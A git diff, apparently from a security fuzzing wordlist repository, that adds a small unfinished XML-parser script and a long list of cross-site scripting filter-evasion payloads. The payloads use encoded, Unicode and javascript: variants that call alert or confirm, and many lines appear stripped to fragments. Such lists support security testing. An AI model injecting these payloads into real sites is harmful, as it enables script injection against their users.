diff --git a/.bin/README.md b/.bin/README.md index 4dd41a18..fb8babaf 100644 --- a/.bin/README.md +++ b/.bin/README.md @@ -13,3 +13,7 @@ e.g. target dir is `Passwords/Common-Credentials` and suffix is `-without-curse- `os-names-mutate.py` mutates `Fuzzing/os-names.txt` to include possible mutations of OS names in a url. By default this script outputs the results in `Fuzzing/os-names-mutated.txt` + +- - - + +`xml-parser.py` parses xml files given as arguments and extracts hardcoded tags. It's meant to be modified as per file basis as every xml file format is unique. \ No newline at end of file diff --git a/.bin/xml-parser.py b/.bin/xml-parser.py new file mode 100644 index 00000000..9d626aab --- /dev/null +++ b/.bin/xml-parser.py @@ -0,0 +1,18 @@ +#!/usr/bin/python3 + +import os +import sys +import xml.etree.ElementTree as ET + +if not sys.argv[1]: + exit(0) + +files=sys.argv[1].split(" ") + +for i in files: + if not os.path.isfile(i): + print("[!] %s does not exist!"%(i)) + exit(2) + +for i in files: + ET \ No newline at end of file diff --git a/Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt b/Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt new file mode 100644 index 00000000..92e5a3bd --- /dev/null +++ b/Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt @@ -0,0 +1,217 @@ +# =========================================================================== # +#? +#? NAME +#? xss-evation.txt +#? +#? SYNOPSIS +#? +#? DESCRIPTION +#? List of Cross-site Scriptings (XSS) samples. +#? Empty lines and lines starting with a # are comments and should be +#? ignored. All other lines contain one payload per line. +#? +# HACKER's INFO +# This file used in EnDe's "Load File" menu. +#? +#? VERSION +#? @(#) xss-evation.txt 1.5 13/05/12 10:51:43 +#? +#? AUTHOR +#? 10-jun-10 Achim Hoffmann, mailto: EnDe (at) my (dash) stp (dot) net +#? +# =========================================================================== # + +#group most-in-one pattern +"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐＂＇，舧艠︐︑--> +#group general filter evasion +"'> +"'> +"'> +"'> +"'> +"'> +"'> +"'> +"'><\script>confirm(42) +"'>confirm(42) +"'>confirm(42) +"'> +"'>alert(42) +"'><;(24)trela=daolno ;''=e>'=d +"'><;(24)trela=daolno ;''=/e>'=d +"'> +# real tab +"'>confirm(42) +# URL-encoded +"'%3e%3cscript%3econfirm(42)%3c/script%3e +"'%253e%253cscript%253econfirm(42)%253c/script%253e +"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +%22%27%3e%3cscript%3econfirm(42)%3c/script%3e +%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e +%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e +%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +# Unicode characters +"'> +"'ܾܼscriptܾalert(42)ܼܯscriptܾ +"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +#group javascript keywords +javascript:alert(42) +javascript:prompt(42) +javascript:confirm(42) +jAvasCript:confirm(42) +jAvas\Cript:confirm(42) +jAvas Cript:confirm(42) +jAvas/* */Cript:confirm(42) + javascript:alert(42) +document +document. +top +top. +top[ +eval +eval( +cookie +.cookie +#group HTML event keywords +onerror +onerror= +onclick +onclick= +onmouseover +onmouseover= +onload +onload= +"onerror +"onerror= +"onclick +"onclick= +"onmouseover +"onmouseover= +"onload +"onload= +#group HTML tag attribute keywords +href= +src= +link= +style= +alt= +title= +egal= +"href= +"src= +"link= +"style= +"alt= +"title= +"egal= +#group HTML tag keywords + +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

+ + + + + + + + + + + +

+ + + + + + + + +\x3Cscript>javascript:alert(1) +'"`> + + +-->

--> +--> +--> +--> +`"'>

+test +test +test +test +test +test +test +test +test +test +test +test +test +test + + + + + + + +"'`>ABC

DEF +"'`>ABC

DEF +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E + + + +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> + + + + +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +ABC

DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+`"'>

+ +

+